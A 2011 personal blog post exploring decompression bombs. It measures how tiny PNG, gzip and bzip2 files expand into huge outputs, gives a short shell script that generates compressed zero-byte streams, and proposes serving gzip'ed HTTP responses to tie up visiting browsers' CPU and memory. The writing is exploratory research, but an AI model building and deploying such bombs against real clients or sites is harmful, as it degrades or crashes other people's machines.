Sep 9, 2011

Big Strings Come in Small Packages

Just how much data can we compress into a small file of an everyday format? Turns out it's quite a bit.

A couple of years ago I tried to battle hotlinkers by weaponizing image files. By substituting the original image with a shock site-type image or a large annoying high-contrast pattern I hoped to disrupt the offending sites' layout, readability and/or sense; hopefully resulting in complaints and the link getting pulled. That didn't work, but while reading about dazzle camoflague and constructing intentionally annoying image files I noticed something. Highly-repetitive-pattern images compressed extremely well in the PNG format; so well that a screen-filling 1024×1280 PNG compressed into a 1K file. In many cases these screen-sized images were smaller in size than the HTTP headers used to send them.

Taking this to its logical conclusion: how large of an image can we fit into a a suitably small PNG file? Using a 1-bit color depth and a single color and GIMP:

Dimensions 12 2562 20482 40962 81922 163842
Pixels 1 64K 4M 16M 64M 268M
Bytes 95 116 618 2144 8257 32761

This means an image file could be transferred over a network in mere milliseconds yet require seconds-worth of CPU usage to decompress, consume hundreds of MBs of RAM and yet be essentially invisible to a user.

Browsers on Windows XP all react distinctly when displaying the 32K 16384×16384 PNG:

CPU RAM Interpretation
Chrome 13 barely a blip
IE6 spikes briefly but returns to baseline quickly
Opera 11.51 several seconds heavy CPU, permanently allocates ~256MB
Firefox 6 heavy, sporadic CPU, allocates ~1GB RAM

After some research I realized that I had just rediscovered the decompression bomb.

💣
A decompression bomb is an attack whereby a compressed file is carefully crafted to decompresses into pathologically large output with the goal of overwhelming the receiver with data. It can be an end in itself but may also be intended to divert archive-scanning antivirus systems from the true attack. They have been around since at least the 1980s. They come in several flavors: Zip bombs, Email bombs and XML bombs.

Could today's widespread file formats be susceptible to a similar attack?

Libpng was susceptible to decompression bombs until quite recently and any applications either using an older version or not following the new recommendations still will be. What other widely used software may be susceptible to decompression bombs?

General Applicability

Several standard components of the WWW rely on compression: When responding to an HTTP request (say for a hotlinked image), we might carry out an asymmetric-style attack by returning gzip'ed HTTP content which would decompress into an enormous file, potentially consuming disproportionate CPU and memory on the client's machine. We'll throw in the less-widely-used but formidable bzip2 for comparison.

The following script generates streams of zero bytes ('\0'), compresses them and saves them to disk:

#!/bin/sh
zeroes() {
  dd if=/dev/zero bs=4096 count=$1;
}
blocks=1024
for n in $(seq 1 9)
do
  bytes=$((4096*blocks))
  zeroes $blocks | bzip2 - > zero-$bytes.bz2
  zeroes $blocks | gzip - > zero-$bytes.gz
  blocks=$((blocks*2))
done

Results

Original Size 4MB 8MB 16MB 32MB 64MB 128MB 256MB 512MB 1GB
Gzip'ed 4KB 8KB 16KB 32KB 65KB 130KB 260KB 512KB 1MB
BZip2'ed 48 48 45 46 79 112 208 402 785

Bzip2 performs astoundingly well, compressing streams of zero bytes (minus overhead) by a factor of ≅ 1 million(!). If HTTP supported bzip we could easily construct a custom response the size of an icon which when decompressed would tie up a client's CPU and a large portion of their memory.

Gzip performs logarithmically, compressing the original by a factor of ≅1000. This performance is not close to bzip2's, but is enough to consider trying a decompression bomb. Let's build a test HTTP response using a gzip'ed stream of zeroes and see how much RAM a web browser uses when using it.

See Also

Comments

Ryan Flynn is a programmer and problem solver.